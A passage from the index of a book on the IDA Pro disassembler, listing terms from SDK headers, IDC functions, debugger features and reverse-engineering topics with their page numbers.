area.hpp, 291, 310

arg_ prefix, 95

argc, 422, 425

argv, 422, 425

arithmetic instructions, simple, 11

ARM code, 410

INDEX 611

armlinux_server server component, 570

array access operations, 135, 172

array elements

accessing, 131

selecting size for, 125

Array option, 125

array tag parameter, 298

Array-creation dialog, 124–125

array-manipulation functions,

259–260

arrays, 130–135

attributes for, 124–126

globally allocated arrays, 131–132

globally allocated structures, 137

heap-allocated arrays, 134–135

heap-allocated structures, 138–140

stack-allocated arrays, 132–134

stack-allocated structures, 138

structure member access, 135–137

of structures, 140–141

arrows window, IDA text view, 65

asc_ prefix, 123

ASCII characters, 121, 447

Ascii column, PDF Objects

window, 510

ASCII dump, searching, 99

ASCII printable characters, 27

ASCII String Style option, Option

menu, 122

ASCII strings, 447

ash variable, 292, 399

asize_t get_struc_size function, 307

AskFile function, 263, 265

askfile_c function, 305

AskStr function, 263

askstr function, 305

AskUsingForm_c dialogs, 340

AskUsingForm_c function, 305,

337–338, 341

AskXXX functions, 263, 292

askXXX interface functions, 334

AskYN function, 263

askyn_c function, 305

ASM files, generating, 242–243

asm_t struct, 380, 399, 402

asms

data member, 402

field, 402

ASPack program, 441

ASProtect program, 441

Assemble dialog, 239–241

Assemble Instruction dialog, 240

Assemble option, Patch Program

menu, 239

assembler tool, 4

assembly language call statement, 164

assembly languages, 4

Assume GCC v3.x names

checkbox, 163

asterisk key (*), 144

asynchronous communications, 504

asynchronous interaction, 536–537

Asynchronous Sockets techniques,

Windows, 504

AT&T assembly syntax, 9

atoll function, 264

Attach option, Debugger menu, 514,

518, 573

Attach to Process option, Debugger

menu, 516, 574

attributes

for arrays, 124–126

for functions, 115–118

auto comments, 233

Auto comments option, 110

auto keyword, IDC, 252

Autogenerated name option, for

named locations, 104

autogenerated names

in Names window, 104

prefixes for, 73

auto.hpp, for API, 291

B (button) field, 339

-B option, 197

b parameter, 94, 160

Bachaalany, Elias, 574

backdoor-style communications

channels, 450

backward navigation button, 83

Bad instruction <BAD> marks option,

110–111

bar function, 106

base address, of array, 131

BaseClass, 158–159

basic blocks, 61–62, 176–177

basic mode toolbar, 53, 208

batch mode, 189, 196–198

612 INDEX

BDS (Binary Diffing Suite), 485

beginner mode, 206

big-endian, CUP, 10

bin directory

FLAIR tools, 217

for SDK, 287

binaries

OS X Mach-O, 24

searches, 493

statically linked, 178

used in first-generation

languages, 4

Binary Diffing Suite (BDS), 485

binary executable files, 18, 434

Binary File Descriptor library

(libbfd), 24

Binary File entry, 45–46

binary file obfuscation, 19

binary files, 347–375

alternative loaders, 372–373

analysis of unknown files, 348–349

loader for, 47–48

loader modules for

overview, 358

pcap loader, 366–372

simpleton loader, 361–366

writing using SDK, 358–360

manually loading Windows PE file,

349–357

scripted loaders, 373–375

binary form, plug-ins, 500

Binary Search dialog, 99

binary searches, of database, 99–100

BINARY_ADD byte code instruction, 379

BinDiff, 485

BinNavi, 280

binutils tool suite, GNU, 24

block statement, 160

blocking operation, 286

blocks, in disassembly window, 64

Bochs, 574–580

Appcall feature for, 578–580

disk image mode for, 577

IDB mode for, 575–576

PE mode for, 576–577

Bochs configuration dialog, 575

Bochs control module, 576

bochsrc file, 577

Borland

code, 419

tools, 404

Borland’s Turbo Assembler

(TASM), 9

Borland-style make files, 289

BOUNDS problem, Problems

Window, 77

BP based frame attribute,

117–118, 424

BP equals to SP attribute, 118

bpt_NtContinue function, 567–568

bracing ({ }) syntax, 254

branches, 171

Break checkbox, Breakpoint Settings

dialog, 526

break statement, 279

Breakpoint List option, Debugger

menu, 523

breakpoint manipulation tools, 519

Breakpoint Settings dialog, 523–526

breakpoints, in debugger, 522–526

bss section, 68, 356

B-tree–style database, 49

buffer array, 94

Bug Reports forum, Hex-Rays bulle-

tin board, 58

bugs, reporting, 58

BugScam scripts, 481

build scripts, 461

BUILDING.txt file, 503

bulletin boards, Hex-Rays, 58

bundled graphing applications, 176

Burneye ELF encryption tool, 442,

455–459, 465, 467

button (B) field, 339

bximage tool, 577

byte code, 4, 379

Byte function, 262

byte_patched notification message, 322

bytes.hpp file, 291, 399

C enum, Enums window, 70

C hotkey, 48, 120

C notation, 130

-c option, 197

INDEX 613

c parameter, 94

C_HEADER_PATH option, 203

C_PREDEFINED_MACROS option, 203

C++, 156–166

calling conventions, 88

inheritance relationships, 164–165

name mangling in, 162–163

object life cycle in, 160–161

reverse engineering references,

165–166

RTTI, 163–164

this pointer in, 156–157

virtual functions and vtables,

157–160

c++filt utility, 25–26

calculator program, Windows, 25

call esi instruction, 492

call flow type, 62, 171

call graphs, 178–180

call instructions, 112, 272, 456,

467, 480

Call Stack dialog, 529

call statement, 437

call_vfunc function, 159

call-by-reference, 255

call-by-value, 255

callflow function, 171

calling conventions

compiler differences for, 430–432

for stack frames, 85–89

call-style cross-references, 171

callui function, 305

canned search features, 98

canonical feature (CF), 381

Capture the Flag

binary, DEFCON, 278

network, DEFCON, 496

Case-sensitive option, 99–100

case-sensitive searches, 100, 493

catalog, of named constants, 112–113

cdecl calling convention, 85–86, 129

cdecl functions, 116

_cdecl modifier, 85

CF (canonical feature), 381

CF_CALL flag, 381

CF_CHGn flag, 381

CF_STOP flag, 381

CF_USEn flag, 381

cfg directory, 39

Change Byte menu option, Patch

Program, 238

Change Color button, color selection

dialog, 208

Change exception definition, Excep-

tion Handling dialog, 564

Change segment attributes dialog, 543

Change Stack Pointer option, 118

Character terminated strings, 122

Characteristics field, 357

charset function, 300

charval function, 297, 300

charval interface, 300

CheckBptfunction, 531–532

choose function, 305, 334

Choose project to attach to dialog, 515

choose2 dialog, 337

choose2 function, 305, 334, 336, 566

chooser dialog, 335

chunked functions, 114–115, 272

CL register, 431

Clampi trojan, 442

class constructor, 160

.class file, 472

Class Informer plug-in, 420, 506–508

class relationships, deducing

between, 165

click-and-drag operation, 119

C-like pseudocode, 500

closing, IDA database files, 51–52

cmd variable, 385, 394

cmd.Operands array, 387, 390

cnbits field, 385

code

converting to data, 119–120

display options for, 109–111

code argument, 339

code bytes, distinguishing from data

bytes, 48

CODE class, 308

code cross-references, 65, 168–169

Code option, 435

CODE XREF, 169

coding scheme, used in Names

window, 73

COFF libraries, 219

collabREate plug-in, 503–506

614 INDEX

Collapse Group button, 187

collapsed node demo, 187

collapsed structures, 146, 153–154

collapsing blocks, in disassembly

window, 64

Collect garbage option, 52

collisions, 221, 223

colon (:) hotkey, 107

color key, 54

color palettes, 192

color selection dialog, 208

coloring nodes, 186

colorized disassembly listings, 245

colors, customizing, 207–208

Colors command, 54

Columns menu option, Hex

window, 67

comma operator, 253

COMMAND function, 536

command history list, 40

command-line

arguments, 22

tools

Borland, 418, 426

Exports window, 68

IDA, 251

Segments window, 74

Comment directive, 232

comment member, for plug-ins, 317

comment.cmt file, 234–235

CommentEx function, 270

commenting

anterior and posterior lines, 108

augmenting information for, with

loadint, 233–235

auto, 233

function comments, 108

overview, 106

regular comments, 107

repeatable comments, 107–108

virtual repeatable, 108

comments option, 110

common operations bar, console user

interface, 190

compact_til function, 369

Compilation successful message, pars-

ing header files, 150

Compiler configuration dialog,

Option menu, 151

compiler differences, 415–432

alternative calling conventions,

430–432

debug vs. release binaries, 428–430

jump tables, 416–420

locating main, 421–428

RTTI implementations, 420

switch statements, 416–420

compiler validation, reasons for

disassembly, 7

compilers

GNU, 86, 136

utilizing stack frames, 83

compiling functions, 89

computer licenses, 33

concrete_class object, 164

Condition field, Breakpoint Settings

dialog, 525

conditional branching, 11, 171

conditional breakpoints, 523

conditional jumps, 436–437

configuration dialog, Bochs, 575

configuration files, 39

configuring plug-ins, 330–331

connect function, 69, 127

console mode, 190–196

common features of, 190–191

specific features of

for Linux, 192–194

for OS X, 194–196

for Windows, 191

consoles

I/O library, 190

limitations of, 190

mouse server, Linux, 192

user interface, 190

constant index values, 137

constants, formatting options for, 112

CONTEXT record, 567

CONTEXT structure, 440, 472, 568

context-sensitive menus, 60, 102,

112, 501

Continue button, toolbar buttons, 521

Continue command, 521

Continue with Unpacked Base

option, 53

control flow graphs, 169, 178, 185

control module, Bochs, 576

converting data, to code (and vice

versa), 119–120

INDEX 615

Cooper, Jeremy, 193, 195

CPU flag, 437, 520

CPU instructions

sets, 286

undocumented, 110

CPU registers, 440

cpu_data function, 394

crashes, restarting after, 52–53

CRC16 value, 220

crc16.cpp file, 220

Create as array option, 126

Create C File option, File menu, 500

Create EXE File command, 360, 365

Create EXE File option, File

menu, 542

create function, 296

Create function tails loader option,

Kernel Options, 115

Create name anyway option, for

named locations, 105

Create Segment command, 353

Create Structure/Union dialog,

143, 152

Create union checkbox, Create

Structure/Union dialog, 143

CREATE_BACKUPS option, 202

create_filename_cmt function, 363

create_func_frame function, 401

CreateArray function, 260, 301

createImportLabel function, 553–554

CreateNetnode function, 332

CreateThread function, 471

CRITICAL_SECTION object, 121

Cross References option, View

menu, 477

cross-references (xrefs), 168–176

code cross-references, 169–171

data cross-references, 171–173

display window, 174

enumerating, using API, 311–314

for function calls, 175–176

graphs for, 180–185

lists of, 173–175

navigational purposes, 81

subview, opening, 174

text, mousing over, 173

Cross-References tab, 172, 187

cryptographic library, OpenSSL,

215–216, 229

C-style strings, 71, 122

C-style union, 143

CTRL-B hotkey, 100

CTRL-ENTER hotkey, 83

CTRL-F1 hotkey, 203

CTRL-F4 hotkey, 191

CTRL-Q hotkey, 204

CTRL-T hotkey, 99

CTRL-X hotkey, 174

current instruction location, 386

current position indicator, 54

custom cross-reference graphs, 183

custom data

formats, 474

data types, 474

custom_ana code, 408

custom_emu code, 408

custom_mnem code, 408

custom_out code, 408

custom_outop code, 408

customizing, 201–210

colors, 207–208

configuration files, 201–207

toolbars, 208–210

cya instruction, 408

Cygwin environment, 17

D command, 144

D hotkey, 120, 122

d_out function, 394, 398, 401

dashed line break, 171

data

converting to code, 119–120

specifying sizes for, 121–122

data bytes, distinguishing from code

bytes, 48

data carousel, 121–122

DATA class, 308

data cross-references, 168

data displays, 55

Data Format menu, Hex window, 67

data storage, in netnodes, 297–301

data structures. See also datatypes

arrays, 130–135

IDA structures, 142–146

importing new, 149–151

and TIL files, 154–156

616 INDEX

data structures (continued)

using standard structures, 151–154

using structure templates, 146–149

DATA XREF, 169

database events, 321

Database Restore dialog, 52–53

data-flow analysis, 481

DataRescue, 32

datatype setup dialog, 121

datatypes. See also data structures

custom, 474

Hex-Rays, 501

for SDK, 302–303

toggling through, 122

db (1 byte of storage), 97

dbg_notification_t enum, 536

dbg_step_until_ret notification, 537

dbg_trace notification, 537

dbg.hpp, for API, 291

dd (4 bytes of storage), 97

dead listings, 79

debug binaries, vs. release binaries,

428–430

DEBUG flag, 330

debug registers, 440

debugger, 513–580

automating with plug-ins, 536–538

detecting, 452–453

displays, reasons for disassembly, 7

displays in, 518–521

handling exceptions with, 561–568

and IDA databases, 541–543

IdaStealth plug-in for, 560–561

instruction pointer warning, 549

launching, 514–518

preventing, 453–454

process control with, 521–530

breakpoints, 522–526

stack traces, 528–529

tracing, 526–528

watches, 529–530

process options dialog, 571–572

remote debugging with, 569–574

attaching to remote process,

573–574

exception handling during, 574

using Hex-Rays debugging

server, 570–573

using scripts and plug-ins

during, 574

selection dialog, 515–516

sessions, MyNav, 508

setup dialog, 545–546, 562–563, 574

scripting for, 530–535

using Bochs, 574–580

Appcall feature for, 578–580

disk image mode for, 577

IDB mode for, 575–576

PE mode for, 576–577

using with obfuscated code,

543–560

decryption and decompression

loops, 546–550

hiding debugger, 555–560

import table reconstruction,

550–555

launching process, 545–546

overview, 540–541

warning message, 518

Debugger menu

Attach option, 514, 518, 573

Attach to Process option, 516, 574

Breakpoint List option, 523

Debugger Options command, 562

Function Tracing option, 526

Instruction Tracing option, 526

Pause Process option, 516

Process Options command, 571

Refresh memory command, 579

Run option, 516

Run to Cursor option, 516

Select debugger option, 548

Stack Trace command, 528–529

Start Process option, 516, 518

Switch Debugger menu, 516

Take Memory Snapshot

command, 542

Terminate Process option, 517

Watch List option, 530

DECISION problem, Problems

Window, 77

declarations, in IDA text view, 65

decoding function, Burneye,

456–459, 465

decompiler editing options,

Hex-Rays, 501

decompilers, 5

dedicated frame pointer, 91

.def files, 403

INDEX 617

Default checkbox, Save Disassembly

Desktop dialog, 209

Default offset column, 136

DEFAULT_FILE_FILTER option, 206

DEFCON 18, Capture the Flag net-

work, 496

Deflate (Pack database) option, 52

DelBpt function, 531

deltas, 392

Demangled Names, Options

menu, 162

Denial of Service attack, 168

de-obfuscation of binaries, static,

454–472

script-oriented, 455–460

x86emu emulation-oriented,

460–472

and anti-debugging, 471–472

de-obfuscation using, 465–470

features of, 470–471

initialization of, 462

operation of, 463–465

de-obfuscation stub, 441–442, 446

destination buffer (dest), 273

destructor table, 492

destructors, 160–161

detecting

debuggers, 452–453

instrumentation, 451–452

virtualization, 449–451

DIF files, generating, 244

directory layout

overview, 38

for SDK, 287–289

sig directory, 39

til directory, 40

Directory option, debugger process

options dialog, 572

disassembler analysis tool, 454

disassembly, 3–14

anti–static analysis techniques,

434–437

first-generation languages, 4

fourth-generation languages, 4

how performed, 7–14

basic algorithm for, 8–9

linear sweep disassembly, 9–10

recursive descent disassembly,

11–14

overview, 5

reasons for, 6–7

second-generation languages, 4

theory of, 4

third-generation languages, 4

disassembly line display options, 109

disassembly line parts, 109

disassembly location, jumping to, 82

Disassembly tab

color selection dialog, 208

Options menu, 109

disassembly view

IDA desktop, 55

synchronizing with hex view, 67

disassembly window, 60–65

IDA graph view in, 61–64

IDA text view in, 64–65

disassembly window scroll bar, 82

disclosure, of vulnerability, 483

disclosure event, 483

discovery event, 483

disk image mode, for Bochs, 577

diskio.hpp file, 359, 362

dispatcher functions, 305

Display at startup checkbox, 44

Display Disassembly Line Parts sec-

tion, Disassembly tab, 110

display format, selecting, 96

Display Graphs option, 487

Display indexes option, 126

Display only defined strings option,

Strings window, 71

display options, disassembly line, 109

DISPLAY_COMMAND_LINE option, 204,

206, 251

DISPLAY_PATCH_SUBMENU option, 204, 206

displays, 59–77

context-sensitive menu actions in, 60

in debugger, 518–521

principal, 60–66

disassembly window, 60–65

Functions window, 66

Output window, 66

secondary, 66–70

Enums window, 70

Exports window, 68

Hex View window, 67–68

Imports window, 68–69

Structures window, 69

618 INDEX

displays (continued)

tertiary, 70–77

Function Calls window, 76

Names window, 72–74

Problems window, 76–77

Segments window, 74

Signatures window, 74–75

Strings window, 70–72

Type Libraries window, 75

and undo, 59

DisplayWelcome value, 44

diStorm utility, 28

divide-by-zero error, 440

DLL (Dynamic Link Library), 462

dll2idt.exe parser, 231

dnbits field, 385

Dfirst function, 268

DfirstB function, 268

Dnext function, 268

DnextB function, 268

Do not display this dialog box again

option, 207

Does not return attribute, 117

Don’t pack database option, 51

DON’T SAVE database option, 52

dos.ldw (MS-DOS EXE loader), 45

doStruct function, 369

DOT language, 176

dotty tool, 176

double word. See 4 bytes of

storage (dd)

double-click navigation, 80–81, 185

double-clicking

cross-reference address, 173

in Function Calls Window, 76

function chunks, 115

hexadecimal values, 81

listed scripts, 250

in Names window, 72

in Output window, 81

in Segments window, 74

strings, in Stings windows, 70

structure names, 146

symbol names, 175

download page, Hex-Rays, 499

DR0–3 registers, 523

DR0–7 registers, 523

dt_xxx values, 388

dummy names, 102, 104, 128, 214

Dump Embedded PE option, File

menu, 471

Dump option, File menu, 470

Dump Typeinfo to IDC File

command, 155

dumpbin utility, 25

dup2 function, 498

dw (2 bytes of storage), 97

Dword function, 262, 269, 456

dynamic analysis, of malware, 6

Dynamic Link Library (DLL), 462

dynamic linking, 22

dynamic memory allocation

function, 134

dynamic_cast operator, 163

dynamically computed target

addresses, anti–static analysis

techniques, 437–444

-e command-line argument, 28

e_lfanew field, 350

EAX register, 89, 94, 436,

439, 559–560

EBP (extended base pointer) register,

91, 439, 451

ebc.py, 411

ebx register, 552

Edit Breakpoint option, 523

Edit Exceptions button, Debugger

Setup dialog, 562

Edit menu, Plugins menu, 485, 508

editing imported functions, 230

EIP instruction pointer, 462

Element width attribute, 126

ELF binaries, 17

ELF encryption tool, Burneye,

455–458

ELF libraries, 219

ELF-specific parsing, 24

empty structure definition, 143

emu function, 390–391

emu.cpp file, 391

Emulate menu, Switch Thread

option, 471

emulation, advantage of over

debugging, 461

emulators, 390–394. See also x86emu

emulator, de-obfuscation of

binaries using

Enabled checkbox, Breakpoint Set-

tings dialog, 524

INDEX 619

EnableTracing function, 533

enabling line prefixes, 63

End address attribute, 116

ENTRY symbol, 575

entry.hpp, for API, 291

Enumerate Heap option, View

menu, 471

enumerated datatype, C enum, 70

enumerating

cross-references, 311–314

functions, 310

single stack frame, 490

structure members, 311

Enums window, 70

envp array, 422

epilogue, of functions, 85

Erdelyi, Gergely, 250, 280

error handling, in IDC language,

258–259

error messages, 258

error strings, 218

ESC key, 60, 82

ESI register, 457

ESP-based stack frame, 90–92

etc directory, for SDK, 288

event notification, for plug-ins,

321–322

exact matches binary searches, 493

exception confirmation dialog,

564–565

Exception Editing dialog, 563

exception handlers, 438–440, 472, 565

Exception Handling dialog, 564

exceptions

handling during remote

debugging, 574

handling with debugger, 561–568

Exceptions dialog, 562–563

exceptions.cfg file, 563, 574

EXE files, generating, 243–244

exec_request_t function, 286

execstack command, 38

executable files

Exports window, 68

using strings on, 28

executable statements, grouping, 83

execute_sync function, 286

execution

of plug-ins, 322–324

of scripts, 250–251

execution control commands, 522

execution traces, 526

exe.sig file, 421

_exit function, 422

Expand Struct Type option, Edit

menu, 145

expanding collapsed structures, 153

exploit-development, 6, 488–495

finding useful virtual addresses,

494–495

locating instruction sequences,

492–494

stack frame breakdown, 488–492

export entry, 231

export ordinal number, 68

Exports window, 68, 545

expressions, in IDC language, 253

expr.hpp file, 292, 331

extended base pointer (EBP) register,

91, 439, 451

extending IDC, with plug-ins,

331–333

extern keyword, 252

extern section, 477–478

external (global) symbols, 20

external mode graphs, 177

external-style graph, 176

extract_address function, 401

f argument, 129

f_LOADER type, 410

F2 hotkey, 523

F12 hotkey, 177

fake interrupt descriptor table, 462

Falliere, Nicolas, 453, 555–558

far addresses, 169

Far function attribute, 117

Fast Library Acquisition for Identi-

fication and Recognition

(FLAIR), 216–217, 583

Fast Library Identification and

Recognition Technology

(FLIRT) signatures. See

FLIRT signatures

fastcall calling convention, 157

fastcall convention for x86, 87–88

fastcall modifier, 88

fclose function, 265

620 INDEX

feature field, 381

FF_XXX constants, 307

fgetc function, 265

field names, 135

file classification, 16–20

file, 16–18

PE Tools, 18–19

PEiD, 19–20

File column, FLIRT signature

selection, 214

file command, 16

File dialog, 45

file extensions, 16

file loading, 45–48

File menu

Create C File option, 500

Create EXE File option, 542

Dump Embedded PE option, 471

Dump option, 470

Script File option, 554

File offset value, 239

File Open dialog, 44

File Save dialog, 365

FILE stream pointer, 365

FILE type, 359

file utility, 16–18, 218–219

FILE_EXTENSIONS option, 205–206

file2base function, 364–365

FileAlignment field, 352

FileAlignment value, 352

fileformatname parameter, 359,

362, 365

filelength function, 265

file-loading dialog, 358

FilemonClass class, 452

filename pattern, 205

FILEREG_PATCHABLE, 364

Find all occurrences checkbox, Text

Search dialog, 99

FindBinary function, 269, 493

FindCode function, 269, 272

FindData function, 269

FindText function, 269

FindWindow function, 452

FindXXX functions, 269

first_from function, 313

first_to function, 313

first-generation languages, 4

fix_proc utility, 404

fixed-length instructions, 9

fl_CF-type cross-references, 273

flag field, 385

flags field, for plug-ins, 317

flags field for loaders, 359

FLAIR (Fast Library Acquisition for

Identification and Recogni-

tion), 216–217, 583

flair directory, 216

flair57.zip version, 216

Flake, Halvar, 481

flat memory model, 117

FLIRT (Fast Library Identification

and Recognition Technol-

ogy) signatures, 211–225

applying, 212–216

creating signature files, 216–225

creating pattern files, 219–221

static libraries for, 217–219

overview, 212

startup signatures, 224–225

flowcharts, 177–178

flowchart-style graph, graph view, 55

flows, 62

Follow system keyboard layout option,

Preferences dialog, 196

Follow TCP Stream command, 496

-fomit-frame-pointer compiler

option, 91

Font command, 57

Font menu, 519

foo function, 12

foobar subroutine, 82

footer function, 401

fopen function, 265

for loops, 254

forking existing projects,

CollabREate, 505

form argument, 338

form parameter, 305

form function, 264

formal parameter names, 228

format strings, 305, 492

formatting

constants, options for, 112

global variables, as structures, 149

instruction operands, 112–113

stack-allocated structures, 148

formcb_t function, 339

INDEX 621

forward navigation button, 83

fourth-generation languages, 4

fprintf function, 265, 490–492

fpro.h, for API, 292

fputc function, 265

frame pointer, 84, 118

Frame pointer delta attribute, 117

frame.hpp, 292, 306

free_til function, 369

FreeBSD application, 213, 224,

422, 498

freeware versions, of IDA, 33

from address, in cross-references, 168

frregs field, 311

frsize field, 311

FS register, 439

full-line comments, 108

func_t (funcs.hpp), datatypes for SDK,

302, 308, 310

FuncItems generator, 283

funcs control block, 310

funcs.hpp, 292, 310

function call

graphs, 76, 169, 178

instructions, 12

tree, 76

Function Calls window, 76

function comments, 108

Function editing dialog, 116

function parameters, 83, 85

function tails, 115

Function Tracing option, Debugger

menu, 526

functions, 113–119

attributes for, 115–118

augmenting information for,

228–233

calling, 84–85

chunks of, 114–115

compiling, 89

creating new, 114

deleting, 114

emulated by x86emu, 467

enumerating, using API, 310

in IDC language

code cross-reference, 267

data cross-reference, 268

database manipulation, 268–269

database search, 269–270

dealing with functions, 266–267

disassembly line

components, 270

file input/output, 264–265

manipulating database

names, 266

reading and modifying data,

262–263

string-manipulation, 264

for user interaction, 263–264

oriented control flow graph, 185

overloading, C++, 162

overview of, 83

for SDK, 304–309

signatures for, 229

stack pointer adjustments, 118–119

tracing, 526

types, setting, 129

undefine, 119

Functions data display, 55

Functions list generator, 282

Functions menu, 471

Functions window, 56, 60, 66, 82,

175, 443

fuzzing technique, 6

G hotkey, 82, 207

g++ compiler, GNU, 86, 156

g++ versions, 163

Gaobot worm, 19

Gas (GNU Assembler), 9

gcc compiler, GNU, 86

GCC tags, 219

gdb(GNU Debugger), 454, 517

GDB Configuration dialog, 572–573

gdb sessions, 569

gdb_server, 569, 572–573

gdbserver component, GNU

Debugger, 517

GDL (Graph Description Language),

176, 193

gdl.hpp, for API, 292

General dialog, 60, 123

General Registers view, 519–520

General Registers window, 520, 525

general-purpose searches, 98

Generate serial names option, 124

622 INDEX

generating signatures, 39

Get prefix, 262

get_byte function, 304

get_first_cref_from function, 309

get_first_cref_to function, 309

get_first_dref_from function, 309

get_first_dref_to function, 309

get_frame function, 306

get_frame_retsize function, 401

get_func function, 306

get_func_name function, 306

get_func_qty function, 306

get_long function, 304

get_next_func function, 306

get_many_bytes function, 304

get_member function, 307

get_member_by_name function, 307

get_name function, 306

get_name_ea function, 306

get_next_area function, 310

get_next_cref_from function, 309

get_next_cref_to function, 309

get_next_dref_from function, 309

get_next_dref_to function, 309

get_original_byte function, 304

get_original_long function, 304

get_original_word function, 304

get_original_XXX functions, 304

get_reg_val function, 538

get_screen_ea function, 305

get_segm_by_name function, 307

get_segm_name function, 308

get_struc function, 307

get_struc_id function, 307

get_true_segm_name function, 308

get_word function, 304

GetArrayElement function, 301

GetBptAttr function, 531

GetBptEA function, 531

GetBptQty function, 531

GetCommandLine function, 426–427

GetCommandLineA function, 552

GetDebuggerEvent function, 532–533,

538, 556

GetDisasm function, 270

GetEntryPointQty function, 275

GetEnvironmentStrings function, 427

GetEventXXX function, 533–535

GetFrameLvarSize function, 490

GetFrameRegsSize function, 490

getFuncAddr function, 479

GetFunctionAttr function, 266, 272

GetFunctionFlags function, 277

GetFunctionName function, 266

GetInputFile function, 275

getline function, 334

getmainargs library function, 425

GetMemberName function, 482

GetMemberOffset function, 271

GetMemberSize function, 482–483

GetMnem function, 270

GetModulehandleA function, 444

GetOpnd function, 270

getn_area function, 310

getn_func function, 306

getnseg function, 308

getopcode.c program, 493

GetOperandValue function, 270

GetOpType function, 270

GetProcAddress function, 445–446, 448,

468–469, 550, 552, 554

GetRegValue function, 525, 530

getseg function, 307, 363

GetStrucSize, 271

Gigapede, 541

gl_comm variable, 397

global (external) symbols, 20

global array, 534

global offset table (GOT), 274, 492,

494–495

global persistent arrays, 259

global variables, formatting as

structures, 149

globally allocated arrays, 131–132

globally allocated structures, 137

gnome-terminal, Gnome, 193

GNU Assembler (Gas), 9

GNU binutils tool suite, 24

GNU compilers, 86, 136, 156

GNU Debugger (gdb), 454, 517

GNU linker, 404

Go button, 45

GOT (global offset table), 274, 492,

494–495

got section, 477–478, 495

goto statements, 502

graph components, 168

Graph Description Language (GDL),

176, 193

graph mode, 185

INDEX 623

graph node, 178

Graph Overview data display, 55,

62, 185

Graph tab, 60

graph view, 55, 185–186

graph viewer, qwingraph, 176

graph view–style display, 55

GRAPH_FORMAT variable, 176

GRAPH_VISUALIZER option, 176,

193,194, 202

graph-based display mode, IDA

freeware 5.0, 583

graphing, 176–187

integrated graph view, 185–188

third-party graphing, 176–185

call graphs, 178–180

cross-reference graphs, 180–182

custom cross-reference graphs,

182–185

flowcharts, 177–178

graphing applications, 176

graphs

grouping nodes in, 187

used in Function Calls Window, 76

graphviz project, 176

grep-style search, 290

Group Nodes option, 64, 187

grouping

blocks, in disassembly window, 64

executable statements, 83

nodes, within graphs, 187

GUI configuration file, 39

GUI versions, of IDA, 197

gunzip archive, 37

.h suffix, 290

Hall of Shame, Hex-Rays website, 32

handling exceptions

with debugger, 561–568

during remote debugging, 574

Hardware Breakpoint checkbox,

Breakpoint Settings

dialog, 524

Hardware breakpoint mode radio

buttons, Breakpoint Settings

dialog, 524

hardware breakpoints, 523, 524,

544, 546

HAS_CALL flags, 389

HAS_JABS flag, 389

HAS_JREL flag, 389

hash function, 447

hashset function, 300

hashstr function, 300

hashval function, 300

hashval_long function, 300

hashvals, 297, 300

hashXXX functions, 300

head command, 212

header fields, PE Tools, 19

header files, for API, 290–294

area.hpp, 291

auto.hpp, 291

bytes.hpp, 291

dbg.hpp, 291

entry.hpp, 291

expr.hpp, 292

fpro.h, 292

frame.hpp, 292

funcs.hpp, 292

gdl.hpp, 292

ida.hpp, 292

idp.hpp, 292

kernwin.hpp, 292

lines.hpp, 292

loader.hpp, 292

name.hpp, 293

netnode.hpp, 293

pro.h, 293

search.hpp, 293

segment.hpp, 293

struct.hpp, 293

typeinf.hpp, 293

ua.hpp, 293

xref.hpp, 293–294

header function, 401

header structure, MS-DOS, 152

.headers program segment, 462

.headers section, 354

.heap database segment, 462

heap program, 134

heap_array variable, 135

HeapAlloc function, 468

heap-allocated arrays, 134–135

heap-allocated structures, 138–140

help files, 204

help member, for plug-ins, 318

624 INDEX

Help menu, IDA, 34

HELPFILE option, 203

hex dumps, 99, 191

hex editor, 67

hex searches, conducting, 100

hex values, two-digit, 99

Hex View window, 40, 67–68, 99, 519

hexadecimal constant, 112

hexadecimal values, 81

Hex-Rays

blog, 579

bulletin boards, posting on, 58

debugging server, remote debug-

ging using, 570–573

download page for, 499

plug-in, 500–502

stance on piracy, 32

support page and forums, 35

hidden messages, restoring, 44

Hide Casts option, 501

Hide Group option, 187

hide_wait_box function, 323

HideDebugger.idc script, 560–561

hiding debugger, 555–560

History subkey, IDA Windows registry

key, 45

HKEY_CURRENT_USER\ Software\Hex-Rays\

IDA registry key, 44, 207

HKEY_CURRENT_USER\Software\Hex-Rays\

IDA\Hidden Messages registry

key, 207

hook_to_notification_point function,

321, 399, 536

Hostname option, debugger process

options dialog, 572

hotkey field, 331

hotkey reassignment, in

idagui.cfg,204

hotkeys, 40, 261

.hpp suffix, 290

HT_DBG function, 537

HT_DBG notification type, 536

HTI_PAK1 constant, 368

HTI_XXX values, 368

HTML document, 16

HTML files, 204, 245

HTTP response packet, 371

hyperlinks, vs. names, 80

HyperUnpackMe2, 472–473

icebp instruction, 564

id field for processors, 385

.id0 file, 49

.id1 file, 49

IDA command line, 251

IDA comments, using semicolon pre-

fix in, 107–108

IDA

configuration file, 37

crashes, restarting after, 52–53

cross-references, 76

database, as virtual memory,

460–461

database files

closing, 51–52

creation of, 50–51

and debugger, 541–543

overview, 48–50

reopening, 52–53

searching, 98–100

desktop

behavior of during analysis,

56–57

overview, 53–56

tips and tricks for, 57

directory, 36

download page, 190

executables, 36

extensions, loaders directory, 39

freeware 5.0, 581–583

graph view, in disassembly window

creating additional disassembly

windows, 64

grouping and collapsing blocks

in, 64

overview, 61

panning in, 62–63

rearranging blocks in, 64

IDA Palace, 36

IDA Sync, Windows Asynchronous

Sockets techniques used

by, 504

installer, 34

loader, 50

modules, plug-ins directory, 39

notifications, CollabREate, 504

parser, 150

scripting, 256, 455

INDEX 625

as software

licenses, 33

purchasing, 34

upgrading, 34

user interface of, 40

versions, 33

stack-pointer analysis, 230

Strings options, 123

structures, 142–146

creating new, 142–143

editing structure members,

144–146

stack frames as, 146

text view, in disassembly window,

64–65

View-EIP disassembly window,

519–520

View-ESP disassembly window, 520

Windows registry key, 45

workspace, 44

ida_export function, 294

IDA_SDK_VERSION macro, 293

idaapi module, 281, 579

idaapi.processor_t class, 411

ida.cfg file, 39, 111, 176, 193, 202–203

<IDADIR> install location, 36

idag64.exe, 38

IDA-generated variable names,

mapping, 96–97

idag.exe, 36

idagui.cfg configuration file, 39,

203–206, 238, 251

IDA.HLP file, 338

ida.hpp file, 290, 292

ida.idc file, 261

ida.int file, 233

idaidp.hpp 380

idainfo (ida.hpp), datatypes for

SDK, 303

idainfo structure, 292

ida.int comment file, 234

ida.key file, 32

idamake.pl, 324

IdaPdf plug-in, 509–510

IDAPython plug-in, 37, 503

examples, 281–284

enumerating cross-

references, 283

enumerating exported

functions, 283–284

enumerating functions, 282

enumerating instructions,

282–283

idaq64.exe, 38

idaq.exe, 36

idasdk61.zip file, 286

IDAStealth configuration dialog, 561

IdaStealth plug-in, for debugger,

560–561

.idata section, 241

idatui.cfg file, 39, 206–207

idauser.cfg file, 203

idauserg.cfg file, 206

idausert.cfg file, 206

